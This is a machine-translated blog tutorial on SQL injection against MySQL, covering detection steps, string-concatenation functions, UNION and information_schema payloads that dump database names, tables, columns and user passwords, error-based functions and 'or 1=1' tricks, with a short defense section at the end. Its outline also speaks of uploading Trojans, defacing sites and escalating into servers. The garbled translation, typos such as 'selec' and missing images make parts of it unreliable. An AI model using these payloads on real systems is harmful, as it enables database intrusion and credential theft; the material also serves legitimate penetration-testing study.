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Penetration test --- database security: detailed explanation of SQL injection into database principle

2022-07-06 23:40:00 Cloud guest technology

1 Introduce

SQL Injection vulnerability is mainly due to , There is no strict filtering when requesting , Causes the incoming statement to be treated as SQL Statement executed , This causes the database to be damaged ( Removed from storage 、 Delete 、 Even the data payment authority fell )

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2 General steps

  1. SQL Injection point detection
    Judge where there is SQL Injection point , Usually in Forms , Article query And other pages related to database operations .

  2. Collect background database information
    Different database injection methods 、 Functions vary , Therefore, the type of database should be determined before injection .
    Such as :
    Special characters 、 Single quotation marks : Let the database return an error
    function :
    version() function :MSQL special

    1 and version()>0
  3. Guess user name and password
    Table name 、 Field name 、 Number of fields 、 User name and password .

  4. lookup Web Backstage management portal
    have access to Directory scanning tool

  5. intrusion and damage
    Log in backstage : Upload the Trojan 、 Tampering with the web 、 To steal information .
    Further rights : intrusion Web Servers and database servers .

3 Inject

Test data

| isbn          | title                            |
| 9787302458210 | SQL Server  From entry to mastery ( The first 2 edition )    |
| 9787115496003 |  Application and practice of virtualization technology                 |
| 9787302510109 |  Algorithm design and analysis ( The first 4 edition )             |
| 9787503442490 |  Mind code                           |
| 9787503421884 |  snow wolf                              |
| 9787539635835 |  Longtou Laotai                           |

3 function

3.1 Common system functions

function effect
version()MySQL edition
user() Database user name
database() Database name
@@datadir Database path
@@version_complie_os Operating system version

3.2 String concatenation function

Three magic weapons :concat(),group_concat(),concat_ws()

3.2.1 concat() function

characteristic :concat(str1,str2,...)
The return result is the string generated by the connection parameter , If any parameter is NULL, The return value is NULL, There can be one or more parameters .

1. Do not use character linking functions :

select isbn,title from books limit 1;
| isbn          | title                            |
| 9787302458210 | SQL Server  From entry to mastery ( The first 2 edition )    |

2. Examples of use
Generally, we need to separate the items with one character , Easy to view data

select concat(isbn,',',title) from books limit 1;
| concat(isbn,',',title)                         |
| 9787302458210,SQL Server  From entry to mastery ( The first 2 edition )    |

3.2.2 concat_ws() function

CONCAT_WS() representative CONCAT With Separator , yes CONCAT() A special form of . The first parameter is the separator for the other parameters . The position of the separator is placed between the two strings to be connected . The separator can be a string , It can also be other parameters . If the separator is NULL, The result is NULL. The function ignores the... After any separator argument NULL value . however CONCAT_WS() No empty strings will be ignored . ( However, we will ignore all of them NULL).
characteristic :CONCAT_WS(separator,str1,str2,…)
Examples of use
 Insert picture description here

3.2.3 group_concat() function

GROUP_CONCAT Function returns a string result , The result is a combination of values in the group .

select bid,author,group_concat(bid) from books where author in(' Jin Yongxian ',' Fang Zhaoxiang   Writing ') group by bid;

No demonstration ,sql The statement is like the above

4 Inject

4.1 The joint query union Inject

The premise of using joint query is that the page we inject must have display bits .

1、 Use union

v' union select username from member where id=1#%

select Must have the same columns , And the data of each column is also the same , meanwhile , Every one of them SELECT The order of the columns in the statement must be the same .
Joint query can be added at the end of the link order by X Based on random number injection , Determine the number of fields in the site according to the returned results of the page .

select bid,author from books union select username from users;

 Insert picture description here
2、 payload:a' order by 4#%

select bid,author from books order by 4#%;

 Insert picture description here

select bid,author from books order by 2#%;

 Insert picture description here
3、 Get the main query consisting of three fields , We use it union To do one. sql Splicing .

a' union selec database(),user(),version()#%
select bid,author,title from books union selec database(),user(),version();

There is no test passed

4.2 information_schema Inject

information_schema The database is MySQL5.0 The database of the system , It's about MySQL Information about all other databases maintained by the server .

select group_concat(schema_name) from information_schema.schemata;

Actual injection test

5.2.1 Get all databases

type :id=/wd=/name=

-1 union select 1,2,3,4,5,6,7,8,group_concat(schema_name) from information_schema.schemata

 Insert picture description here

4.2.2 Get the table of the specified database


a' union select table_schema ,table_name,3 from information_schema.tables where table_schema='library'
select bid,author,title from books union select table_schema ,table_name,3 from information_schema.tables where table_schema='library';

 Insert picture description here

4.2.3 Get the field name of the specified table


a' union select table_name,column_name,3 from information_schema.columns where table_name='users'#%
select bid,author,title from books  union select table_name,column_name,3 from information_schema.columns where table_name='users';

 Insert picture description here

4.2.4 Get the value of the field


 a' union select username ,password,3 from users#%
select bid,author,title from books union select username,password,3 from users;

 Insert picture description here

4.3 Based on error information injection

This method is to display no bits on the page , however echomysql_error() function , It can only be used when the front end outputs an error message .
The advantage is that the injection speed is fast , The disadvantage is that the statement is more complex , And only use limit Guess in turn . On the whole , Error reporting injection is actually a formulaic injection method , Mainly used to display no bits in the page , But with echomysql_error() Use... When an error message is output . common select/insert/update/delete Injection can use error reporting to obtain information .

4.3.1 Three common error reporting functions

updatexml(): The function is MYSQL Yes XML Document data for query and modification XPATH function
extractvalue() : The function is also MYSQL Yes XML Document data for query XPATH function .
floor(): MYSQL The function used to round in .

4.4 Digital injection

or 1=1

4.5 Search Injection

When searching in the search box , Become a search type .
The biggest difference between numeric and character injection : The numeric type does not need to be closed in single quotation marks , String types require single quotation marks .

%xxx% or 1=1 #%'

5 sql Inject defense

  1. Strict escaping and filtering of input
  2. Use parameterization (Parameterized): There are a lot of ORM The framework will automatically use parameterization to solve the injection problem , But it also provides " Splicing " The way , So you need to be careful when using !

Reference article :


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